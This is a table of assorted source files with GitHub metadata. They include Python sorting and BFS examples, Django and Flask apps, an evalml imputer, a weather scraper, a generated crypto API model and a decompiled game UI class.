| blob_id (string, 40) | directory_id (string, 40) | path (string, 2-616) | content_id (string, 40) | detected_licenses (list, 0-69) | license_type (2 classes) | repo_name (string, 5-118) | snapshot_id (string, 40) | revision_id (string, 40) | branch_name (string, 4-63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k-686M, nullable) | star_events_count (int64, 0-209k) | fork_events_count (int64, 0-110k) | gha_license_id (23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (213 classes) | src_encoding (30 classes) | language (1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2-10.3M) | extension (246 classes) | content (string, 2-10.3M) | authors (list, 1) | author_id (string, 0-212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
569976ce007d96645231274a1b5b570bdffd55bc
|
6ada2963ec266fe22c3890b4aa0fae1bd179efbd
|
/排序/低频考点选择排序/SelectSort.py
|
3a9e31a59212f71a3b3d1b1aca331ef7cb508bf0
|
[] |
no_license
|
guohaoyuan/algorithms-for-work
|
e40bc920dbae0436146b590441d4c83d1fb8ab51
|
f1bbd6b3197cd9ac4f0d35a37539c11b02272065
|
refs/heads/master
| 2023-06-20T21:55:46.037990
| 2021-08-06T08:20:05
| 2021-08-06T08:20:05
| 267,294,002
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 500
|
py
|
def SelectSort(nums):
n = len(nums)
if not nums:
return nums
for i in range(n):
        # initialize the index of the current minimum
nMin = i
        # find the index of the smallest value in nums[i+1..n-1]
for j in range(i + 1, n):
if nums[j] < nums[nMin]:
nMin = j
        # swap the minimum into position i, extending the sorted prefix
nums[i], nums[nMin] = nums[nMin], nums[i]
if __name__ == '__main__':
nums1 = [5,4,3,2,1]
SelectSort(nums1)
print(nums1)
|
[
"970992936@qq.com"
] |
970992936@qq.com
|
4fece9a10c8b3a7bd61a3ad0fa6e6c520c609d01
|
bb1359ea6000e2d64f66e408aae2197b22b3a4bf
|
/setup.py
|
ff2a71b81bfeba7094a18b34cae7fdeb41e45198
|
[] |
no_license
|
aver007/proc-conveyor
|
34ff575a0750858936a575e5f3187349defcab28
|
2c07ec9f77d7253e97e4cf779962b2b99c948341
|
refs/heads/main
| 2023-02-10T03:03:46.943617
| 2021-01-07T13:49:24
| 2021-01-07T13:49:24
| 327,293,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
from setuptools import setup, find_packages
with open("README.md", "r") as readme_file:
readme = readme_file.read()
requirements = []
setup(
name="procconveyor",
version="0.0.3",
author="aver",
author_email="a.v.e.r@mail.ru",
description="A package to make conveyor of parallel data processing",
long_description=readme,
long_description_content_type="text/markdown",
url="https://github.com/aver007/proc-conveyor/",
packages=find_packages(),
install_requires=requirements,
classifiers=[
"Programming Language :: Python :: 3.8",
],
)
|
[
"a.v.e.r@mail.ru"
] |
a.v.e.r@mail.ru
|
2e6f87fe63ffda59f760bcfcff3525573e2a2a3b
|
a9c0d5962138e54932be71d46e6ddf30242f874a
|
/evalml/pipelines/components/transformers/imputers/target_imputer.py
|
cd91575090fd467e44b7c1c1098cf13cfdb72185
|
[
"BSD-3-Clause"
] |
permissive
|
ObinnaObeleagu/evalml
|
b7ddaea238fce3278266a756d0d3173a5ea3ad96
|
3b5bf62b08a5a5bc6485ba5387a08c32e1857473
|
refs/heads/main
| 2023-06-29T05:00:57.351501
| 2021-07-28T14:01:24
| 2021-07-28T14:01:24
| 390,377,439
| 1
| 0
|
BSD-3-Clause
| 2021-07-28T14:17:26
| 2021-07-28T14:17:25
| null |
UTF-8
|
Python
| false
| false
| 4,818
|
py
|
from functools import wraps
import pandas as pd
from sklearn.impute import SimpleImputer as SkImputer
from evalml.exceptions import ComponentNotYetFittedError
from evalml.pipelines.components import ComponentBaseMeta
from evalml.pipelines.components.transformers import Transformer
from evalml.utils import (
_retain_custom_types_and_initalize_woodwork,
infer_feature_types,
)
class TargetImputerMeta(ComponentBaseMeta):
"""A version of the ComponentBaseMeta class which handles when input features is None"""
@classmethod
def check_for_fit(cls, method):
"""`check_for_fit` wraps a method that validates if `self._is_fitted` is `True`.
It raises an exception if `False` and calls and returns the wrapped method if `True`.
"""
@wraps(method)
def _check_for_fit(self, X=None, y=None):
klass = type(self).__name__
if not self._is_fitted and self.needs_fitting:
raise ComponentNotYetFittedError(
f"This {klass} is not fitted yet. You must fit {klass} before calling {method.__name__}."
)
else:
return method(self, X, y)
return _check_for_fit
class TargetImputer(Transformer, metaclass=TargetImputerMeta):
"""Imputes missing target data according to a specified imputation strategy.
Arguments:
impute_strategy (string): Impute strategy to use. Valid values include "mean", "median", "most_frequent", "constant" for
numerical data, and "most_frequent", "constant" for object data types. Defaults to "most_frequent".
fill_value (string): When impute_strategy == "constant", fill_value is used to replace missing data.
Defaults to None which uses 0 when imputing numerical data and "missing_value" for strings or object data types.
random_seed (int): Seed for the random number generator. Defaults to 0.
"""
name = "Target Imputer"
hyperparameter_ranges = {"impute_strategy": ["mean", "median", "most_frequent"]}
"""{
"impute_strategy": ["mean", "median", "most_frequent"]
}"""
modifies_features = False
modifies_target = True
def __init__(
self, impute_strategy="most_frequent", fill_value=None, random_seed=0, **kwargs
):
parameters = {"impute_strategy": impute_strategy, "fill_value": fill_value}
parameters.update(kwargs)
imputer = SkImputer(strategy=impute_strategy, fill_value=fill_value, **kwargs)
super().__init__(
parameters=parameters, component_obj=imputer, random_seed=random_seed
)
def fit(self, X, y):
"""Fits imputer to target data. 'None' values are converted to np.nan before imputation and are
treated as the same.
Arguments:
X (pd.DataFrame or np.ndarray): The input training data of shape [n_samples, n_features]. Ignored.
y (pd.Series, optional): The target training data of length [n_samples].
Returns:
self
"""
if y is None:
return self
y = infer_feature_types(y).to_frame()
# Convert all bool dtypes to category for fitting
if (y.dtypes == bool).all():
y = y.astype("category")
self._component_obj.fit(y)
return self
def transform(self, X, y):
"""Transforms input target data by imputing missing values. 'None' and np.nan values are treated as the same.
Arguments:
X (pd.DataFrame): Features. Ignored.
y (pd.Series): Target data to impute.
Returns:
(pd.DataFrame, pd.Series): The original X, transformed y
"""
if X is not None:
X = infer_feature_types(X)
if y is None:
return X, None
y_ww = infer_feature_types(y)
y_df = y_ww.ww.to_frame()
# Return early since bool dtype doesn't support nans and sklearn errors if all cols are bool
if (y_df.dtypes == bool).all():
return X, _retain_custom_types_and_initalize_woodwork(
y_ww.ww.logical_type, y
)
transformed = self._component_obj.transform(y_df)
if transformed.shape[1] == 0:
raise RuntimeError("Transformed data is empty")
y_t = pd.Series(transformed[:, 0], index=y_ww.index)
return X, _retain_custom_types_and_initalize_woodwork(y_ww.ww.logical_type, y_t)
def fit_transform(self, X, y):
"""Fits on and transforms the input target data.
Arguments:
X (pd.DataFrame): Features. Ignored.
y (pd.Series): Target data to impute.
Returns:
(pd.DataFrame, pd.Series): The original X, transformed y
"""
return self.fit(X, y).transform(X, y)
|
[
"noreply@github.com"
] |
ObinnaObeleagu.noreply@github.com
|
1a896dc28ce4ced3fec850b05826db2ed69b1f3c
|
f23efb6ae136f7a5c9124807bb5561ddfb6e76d6
|
/get-weather-data updated minneapolis.py
|
fd698c4dc908ee14bc1b668e56b1ff445d1bcd97
|
[] |
no_license
|
amschons/Python-Data-Mining
|
5998c12ef3ee96a711f46130c8dabd433b78386b
|
1528ca0d434424fc956cf40e59fb3ae5bf28e977
|
refs/heads/master
| 2021-01-16T10:25:34.496974
| 2020-02-28T03:37:16
| 2020-02-28T03:37:16
| 243,081,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,063
|
py
|
from bs4 import BeautifulSoup
import urllib, urllib.request, time
from urllib.request import Request, urlopen
# Create/open a file called wunder.txt (which will be a comma-delimited file)
f = open('minneapolis-data.txt', 'w')
# Iterate through year, month, and day
for y in range(2018, 2019):
for m in range(1, 13):
for d in range(1, 32):
# Check if leap year
if y%400 == 0:
leap = True
elif y%100 == 0:
leap = False
elif y%4 == 0:
leap = True
else:
leap = False
# Check if already gone through month
if (m == 2 and leap and d > 29):
continue
elif (m == 2 and d > 28):
continue
            elif (m in [4, 6, 9, 11] and d > 30):  # months with only 30 days
continue
# Open wunderground.com url
url = "https://www.wunderground.com/history/daily/us/mn/fort-snelling/KMSP/date"+str(y)+ "/" + str(m) + "/" + str(d)
req = Request(url, headers={'User-Agent': 'Chrome/63.0.3239.132'})
page = urlopen(req).read()
soup = BeautifulSoup(page, "html.parser")
            # Grab all "nobr" spans once; individual readings are pulled out by index below
            spans = soup.findAll(attrs={"class": "nobr"})
            AvgDayTemp = spans[5].span.string
            # Get MaxTemp from page
            MaxTemp = spans[6].span.string
            # Get MinTemp from page
            MinTemp = spans[13].span.string
            # Get precip from page
            precip = spans[9].span.string
            # Get dewpoint from page
            dewpoint = spans[8].span.string
# Format month for timestamp
if len(str(m)) < 2:
mStamp = '0' + str(m)
else:
mStamp = str(m)
# Format day for timestamp
if len(str(d)) < 2:
dStamp = '0' + str(d)
else:
dStamp = str(d)
# Build timestamp
timestamp = str(y) + mStamp + dStamp
# Write timestamp and temperature to file
            f.write(timestamp + ',' + AvgDayTemp + '\n')
#pause code for a few seconds
time.sleep(3)
# Done getting data! Close file.
f.close()
|
[
"noreply@github.com"
] |
amschons.noreply@github.com
|
4284532b66837296269e49b95c780a3711beeef6
|
556bf04696deb7226661bf09df59b858a7d05cff
|
/ProyectoCarnet/ProyectoCarnet/urls.py
|
ec2315b48e42c5ecde4a8b2ab5418f9a85d79a50
|
[] |
no_license
|
Maxi78-star/ProyectoCarnet
|
469f604761cbaeecfa0c77d751f2ca5a4f01af5a
|
0cc71b3fb7a086422d9af611337bc18f380061e1
|
refs/heads/master
| 2022-12-17T00:04:38.510951
| 2020-09-07T18:20:23
| 2020-09-07T18:20:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 756
|
py
|
"""ProyectoCarnet URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
|
[
"lucascar007@gmail.com"
] |
lucascar007@gmail.com
|
629159ba52f417906f5bb6cc4601b105867512b8
|
74482894c61156c13902044b4d39917df8ed9551
|
/cryptoapis/model/list_omni_transactions_by_block_height_response_item_senders.py
|
a069a0dc3dc1c953c0673e13e17bfe8dc8044370
|
[
"MIT"
] |
permissive
|
xan187/Crypto_APIs_2.0_SDK_Python
|
bb8898556ba014cc7a4dd31b10e24bec23b74a19
|
a56c75df54ef037b39be1315ed6e54de35bed55b
|
refs/heads/main
| 2023-06-22T15:45:08.273635
| 2021-07-21T03:41:05
| 2021-07-21T03:41:05
| 387,982,780
| 1
| 0
|
NOASSERTION
| 2021-07-21T03:35:29
| 2021-07-21T03:35:29
| null |
UTF-8
|
Python
| false
| false
| 7,262
|
py
|
"""
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: developers@cryptoapis.io
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from cryptoapis.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
class ListOmniTransactionsByBlockHeightResponseItemSenders(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'address': (str,), # noqa: E501
'amount': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'address': 'address', # noqa: E501
'amount': 'amount', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, address, amount, *args, **kwargs): # noqa: E501
"""ListOmniTransactionsByBlockHeightResponseItemSenders - a model defined in OpenAPI
Args:
address (str): Represents the hash of the address that provides the funds.
amount (str): Defines the amount of the sent funds as a string.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.address = address
self.amount = amount
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
|
[
"kristiyan.ivanov@menasoftware.com"
] |
kristiyan.ivanov@menasoftware.com
|
ddd782644d54dc416f234e5963dc3d4a507117b2
|
244ecfc2017a48c70b74556be8c188e7a4815848
|
/res/scripts/client/gui/scaleform/daapi/view/meta/referralreferrerintrowindowmeta.py
|
74b474d33d70854685ec4e30e04785d04176fbd3
|
[] |
no_license
|
webiumsk/WOT-0.9.12
|
c1e1259411ba1e6c7b02cd6408b731419d3174e5
|
5be5fd9186f335e7bae88c9761c378ff5fbf5351
|
refs/heads/master
| 2021-01-10T01:38:36.523788
| 2015-11-18T11:33:37
| 2015-11-18T11:33:37
| 46,414,438
| 1
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 859
|
py
|
# 2015.11.18 11:55:12 Central Europe Standard Time
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/ReferralReferrerIntroWindowMeta.py
from gui.Scaleform.framework.entities.abstract.AbstractWindowView import AbstractWindowView
class ReferralReferrerIntroWindowMeta(AbstractWindowView):
def onClickApplyButton(self):
self._printOverrideError('onClickApplyButton')
def onClickHrefLink(self):
self._printOverrideError('onClickHrefLink')
def as_setDataS(self, data):
if self._isDAAPIInited():
return self.flashObject.as_setData(data)
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\scaleform\daapi\view\meta\referralreferrerintrowindowmeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.18 11:55:12 Central Europe Standard Time
|
[
"info@webium.sk"
] |
info@webium.sk
|
0664321ec6bb6e160de4796989e888b1495f9241
|
c7adbb31dd6ca54c32d5e4eaf8c7479f5d5147a2
|
/src/battalion/autodoc.py
|
e21839fa0739e82c88db94027b71d5393124afd4
|
[
"MIT"
] |
permissive
|
rocktavious/battalion
|
7ba8e4f5325e76fc3798acd029b5a7e5c07a30bf
|
1364bf8a17b354e67c7c9db17989e39e8bab9a39
|
refs/heads/master
| 2020-04-06T06:58:36.909682
| 2016-02-12T16:56:41
| 2016-02-12T16:56:41
| 31,448,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,923
|
py
|
from __future__ import absolute_import
import logging
from inspect import getdoc, cleandoc, isclass
from .base import BaseCommand
from .handler import HandlerMarker
from .utils import get_command_args, get_command_spec
LOG = logging.getLogger(__name__)
class AutoDocCommand(BaseCommand):
"""
Class that supports generating the docopt docstrings for the class and
it's command functions.
"""
class State:
column_padding = 30
def __init__(self):
super(AutoDocCommand, self).__init__()
if self.__doc__ is None:
self.__doc__ = """"""
# We check if autodoc has already happend so that
# so that test frameworks can keep generating new
# instances of the same class without redocumenting
# which will cause a failure
if not hasattr(self, "__autodoc__"):
self.generate_class_doc()
self.generate_commands_doc()
self.set_autodoc(self.docstring)
@classmethod
def set_autodoc(cls, docstring):
cls.__autodoc__ = docstring
@property
def docstring(self):
return cleandoc(self.__autodoc__)
def generate_class_doc(self):
LOG.debug('Documenting %s', self.name)
new_doc = getdoc(self) or """{0}""".format(self.name)
new_doc += "\n\n"
new_doc += self.generate_usage()
new_doc += self.generate_options()
new_doc += self.generate_commands()
self.__autodoc__ = cleandoc(new_doc)
def generate_commands_doc(self):
for name, func in self.commands.items():
if isclass(func) and issubclass(func, HandlerMarker):
LOG.debug('Documenting Command %s', name)
self.commands[name] = func()
else:
LOG.debug('Documenting Command %s', name)
new_command_doc = getdoc(func) or """{0}""".format(name)
new_command_doc += "\n\n"
new_command_doc += self.generate_command_usage(name, func)
new_command_doc += self.generate_command_options(func)
func.__autodoc__ = cleandoc(new_command_doc)
self.commands[name] = func
def generate_usage(self):
docstring = ""
if "Usage:" not in self.__doc__:
docstring += "Usage:\n"
docstring += " {0} [options] <command> [<args>...]\n".format(self.name)
docstring += " {0} [options]\n\n".format(self.name)
return docstring
def generate_options(self):
if "Options:" not in self.__doc__:
docstring = "Options:\n"
for flags, desc in self._state.options:
docstring += " {0:<{2}} {1}\n".format(flags,
desc,
self._state.column_padding)
docstring += "\n"
return docstring
def generate_commands(self):
if "Commands:" not in self.__doc__:
docstring = "Commands:\n"
for k, v in self.commands.items():
docstring += " {0:<{2}} {1}\n".format(k,
getdoc(v),
self._state.column_padding)
docstring += "\n"
return docstring
def generate_command_usage(self, name, command):
docstring = ""
if command.__doc__ is None or "Usage:" not in command.__doc__:
docstring += "Usage:\n {0} [options]\n".format(name)
args = get_command_args(command)
spec = get_command_spec(command)
if args:
docstring += " {0} ".format(name)
for arg_name in args:
if spec[arg_name] is not None:
docstring += "[<{0}>] ".format(arg_name)
else:
docstring += "<{0}> ".format(arg_name)
docstring += "\n"
docstring += "\n"
return docstring
def generate_command_options(self, command):
docstring = ""
if command.__doc__ is None or "Options:" not in command.__doc__:
args = get_command_spec(command)
if args:
docstring += "Options:\n"
for arg, default in args.items():
flag_def = "--{0}=<{1}>".format(arg,
arg.upper())
docstring += " {0:<{3}} {1} [default: {2}]\n".format(flag_def,
' ',
default,
self._state.column_padding)
docstring += "\n"
return docstring
|
[
"kyle.rockman@mac.com"
] |
kyle.rockman@mac.com
|
a28f0d2eec4575032824f25a67eb200a4bf0eded
|
6f452f316d0efe21d713dca1fea8d2ff6b9cec4d
|
/week3-homework/day0x12/run.py
|
af977f62f7fc1d78c0e77e7d76e6bfabe76cba2c
|
[] |
no_license
|
Qingyaya/python-S2
|
6901babee1179822c84e0c9c6f94d322190f2a94
|
eac4eaf818fdd9afa05950394599211305b1bd00
|
refs/heads/master
| 2021-01-20T12:16:45.126346
| 2017-09-25T16:20:24
| 2017-09-25T16:20:24
| 101,709,084
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
#-*- coding:utf-8 -*-
from flask import Flask
from flask import render_template
import json
app = Flask(__name__)
@app.route('/')
def hello_world():
file = open('test.json','r+')
file_text=file.read()
file_text = dict(json.loads(file_text))
return render_template('real.html',data=file_text)
if __name__ == '__main__':
app.run(debug=True)
|
[
"shashaxiaoge@163.com"
] |
shashaxiaoge@163.com
|
bdfd14d14304c356823395ce7952ae3075594c07
|
0abd812a50ba3330734fcbb0088a74c5ad6735a2
|
/breadth-first-search/bfs.py
|
423ec23b5d3dfe5433e2d6d4e8b312e43421fa24
|
[] |
no_license
|
scMarth/Learning
|
a914af6f6327454234e5f98dfc8cf95d6d4f8077
|
ae696461c2c8edc9944879503cce01d525cf4ce0
|
refs/heads/master
| 2023-08-03T05:13:03.162533
| 2023-07-28T22:58:51
| 2023-07-28T22:58:51
| 120,689,926
| 2
| 0
| null | 2022-12-11T13:14:07
| 2018-02-08T00:33:42
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
class Node(object):
def __init__(self, value):
self.value = value
self.children = []
def bfs(node, searching_for):
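    # Breadth-first search: pop nodes from the front of the unvisited queue, return the
    # first node whose value matches, and enqueue children that have not been seen yet.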
unvisited = []
visited = []
unvisited.append(node)
while unvisited != []:
curr_node = unvisited.pop(0) # remove and return item 0
print(curr_node.value)
if curr_node.value == searching_for:
return curr_node
for child in curr_node.children:
if child in visited:
continue
if child not in unvisited:
unvisited.append(child)
visited.append(curr_node)
a = Node("A")
b = Node("B")
c = Node("C")
d = Node("D")
e = Node("E")
f = Node("F")
g = Node("G")
h = Node("H")
a.children.append(b)
a.children.append(c)
b.children.append(d)
b.children.append(e)
c.children.append(f)
c.children.append(g)
e.children.append(h)
result = bfs(a, "H")
print(result)
print(result.value)
'''
A
/ \
B C
/ \ / \
D E F G
|
H
'''
|
[
"vlantaca@gmail.com"
] |
vlantaca@gmail.com
|
a88915a21da701b82de03cc99e7b2670f76d2b6a
|
a4c6dd040b96a8b351fa555fab3f660e8f74e924
|
/college/users/views.py
|
1e9be0fdc8c9926a897abe7719d2bb1505435d68
|
[] |
no_license
|
lambusandeep29/interview-task
|
277fff674ce0840e8af6e5e51cdd891b7e8c47f5
|
054aad2baf2d03330d78486237f316cd5e4a5524
|
refs/heads/main
| 2023-03-21T02:49:11.282118
| 2021-03-10T10:33:34
| 2021-03-10T10:33:34
| 346,321,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,999
|
py
|
from django.shortcuts import render
from rest_framework import generics, status
from rest_framework.response import Response
from rest_framework_simplejwt.views import TokenViewBase
from .permissions import IsAdmin, IsStudent, IsTeacher
# Create your views here.
from .models import User
from .serializers import UserLoginSerializer, UserRefreshTokenSerializer, UserSerializer, \
ResetPasswordSerializer, AddUserSerializer, ListStudentSerializer
class LoginAPIView(TokenViewBase):
serializer_class = UserLoginSerializer
class RefreshTokenApiView(TokenViewBase):
serializer_class = UserRefreshTokenSerializer
class GetUserFromEmail(generics.ListAPIView):
serializer_class = UserSerializer
permission_classes = []
def get_queryset(self):
return User.objects.filter(email=self.kwargs['email'])
def list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
serializer = self.get_serializer(queryset, many=True)
if not serializer.data:
return Response({}, status=status.HTTP_400_BAD_REQUEST)
return Response(serializer.data, status=status.HTTP_200_OK)
class ResetPassword(generics.CreateAPIView):
serializer_class = ResetPasswordSerializer
queryset = User.objects.all()
permission_classes = []
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
return Response({}, status=status.HTTP_201_CREATED)
class UserListCreateApiView(generics.ListCreateAPIView):
serializer_class = AddUserSerializer
queryset = User.objects.all()
permission_classes = [IsAdmin | IsTeacher]
class ListStudentsApiView(generics.ListAPIView):
serializer_class = ListStudentSerializer
permission_classes = [IsStudent]
def get_queryset(self):
return User.objects.filter(user_type=User.USER_TYPE_STUDENT)
|
[
"lambusandeep29@gmail.com"
] |
lambusandeep29@gmail.com
|
41bf2e1ac07b069d10926ef5e0e04ca1b17115fc
|
7b437e095068fb3f615203e24b3af5c212162c0d
|
/enaml/wx/wx_toolkit_object.py
|
280c0ed530eb8a10ffe97619b83d71ddfa0c89b1
|
[
"BSD-3-Clause"
] |
permissive
|
ContinuumIO/enaml
|
d8200f97946e5139323d22fba32c05231c2b342a
|
15c20b035a73187e8e66fa20a43c3a4372d008bd
|
refs/heads/master
| 2023-06-26T16:16:56.291781
| 2013-03-26T21:13:52
| 2013-03-26T21:13:52
| 9,047,832
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,594
|
py
|
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
import wx
from atom.api import Typed
from enaml.widgets.toolkit_object import ProxyToolkitObject
class WxToolkitObject(ProxyToolkitObject):
""" A Wx implementation of an Enaml ProxyToolkitObject.
"""
#: A reference to the toolkit widget created by the proxy.
widget = Typed(wx.Object)
#--------------------------------------------------------------------------
# Initialization API
#--------------------------------------------------------------------------
def create_widget(self):
""" Create the toolkit widget for the proxy object.
This method is called during the top-down pass, just before the
'init_widget()' method is called. This method should create the
toolkit widget and assign it to the 'widget' attribute.
"""
self.widget = wx.Object()
def init_widget(self):
""" Initialize the state of the toolkit widget.
This method is called during the top-down pass, just after the
'create_widget()' method is called. This method should init the
state of the widget. The child widgets will not yet be created.
"""
pass
def init_layout(self):
""" Initialize the layout of the toolkit widget.
This method is called during the bottom-up pass. This method
should initialize the layout of the widget. The child widgets
will be fully initialized and layed out when this is called.
"""
pass
#--------------------------------------------------------------------------
# ProxyToolkitObject API
#--------------------------------------------------------------------------
def init_top_down(self):
""" Initialize the proxy tree for the top-down pass.
"""
self.create_widget()
self.init_widget()
def init_bottom_up(self):
""" Initialize the proxy tree for the bottom-up pass.
"""
self.init_layout()
def destroy(self):
""" A reimplemented destructor.
This destructor will drop the reference to the toolkit widget.
"""
if self.widget:
try:
self.widget.Destroy()
except AttributeError:
pass
del self.widget
super(WxToolkitObject, self).destroy()
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def parent_widget(self):
""" Get the parent toolkit widget for this object.
Returns
-------
result : wxObject or None
The toolkit widget declared on the declaration parent, or
None if there is no such parent.
"""
parent = self.parent()
if parent is not None:
if parent.widget:
return parent.widget
def child_widgets(self):
""" Get the child toolkit widgets for this object.
Returns
-------
result : iterable of wxObject
The child widgets defined for this object.
"""
for child in self.children():
if child.widget:
yield child.widget
|
[
"sccolbert@gmail.com"
] |
sccolbert@gmail.com
|
544c64522277631404326eeb304e2a5d5f03898f
|
fcd7f75c0d8c02160ac1a6bdc8e0020fe61a59ac
|
/apps/usuario/models.py
|
cd25eeb02a9e36922663c5e6cb6c7ab95fe832e6
|
[] |
no_license
|
KevinFernandoVidal/Reto4-Datetime
|
2a2d6668eb077f8155d2997001ce54c5e6843309
|
110c0d38505b5f66f55531a70177bb0944178c0f
|
refs/heads/main
| 2023-08-15T17:08:00.380183
| 2021-10-17T23:12:11
| 2021-10-17T23:12:11
| 418,275,677
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 451
|
py
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Persona(models.Model):
cedula = models.IntegerField(unique=True)
nombre = models.CharField(max_length=100)
apellido = models.CharField(max_length=100)
telefono = models.IntegerField(null=True, blank=True)
id_user = models.OneToOneField(User, on_delete=models.CASCADE)
def __str__(self):
return self.nombre
|
[
"kefevimi@gmail.com"
] |
kefevimi@gmail.com
|
1d1db61384515c6227ccc9f8acd8f51139c80d47
|
6cce75b61bec5762cfdef7fee3c5f3b5ec4960ae
|
/Corrfunc/bases/dcosmo.py
|
170d804f7e520ec5fa115be8d3720f7a04502816
|
[
"MIT"
] |
permissive
|
abbyw24/Corrfunc
|
1321d372ca97076daad389410701e0b908f7cc51
|
d9c821bcebd7225cf43ec9e09dfe817387c73f62
|
refs/heads/master
| 2022-11-26T17:45:47.553308
| 2020-07-31T22:29:13
| 2020-07-31T22:29:13
| 285,667,263
| 0
| 0
|
MIT
| 2020-08-06T20:40:12
| 2020-08-06T20:40:11
| null |
UTF-8
|
Python
| false
| false
| 1,523
|
py
|
import numpy as np
from nbodykit.lab import cosmology
from utils import partial_derivative
def write_bases(rmin, rmax, saveto, ncont=300, **kwargs):
bases = get_bases(rmin, rmax, ncont=ncont, **kwargs)
np.savetxt(saveto, bases.T)
nprojbins = bases.shape[0]-1
return nprojbins, saveto
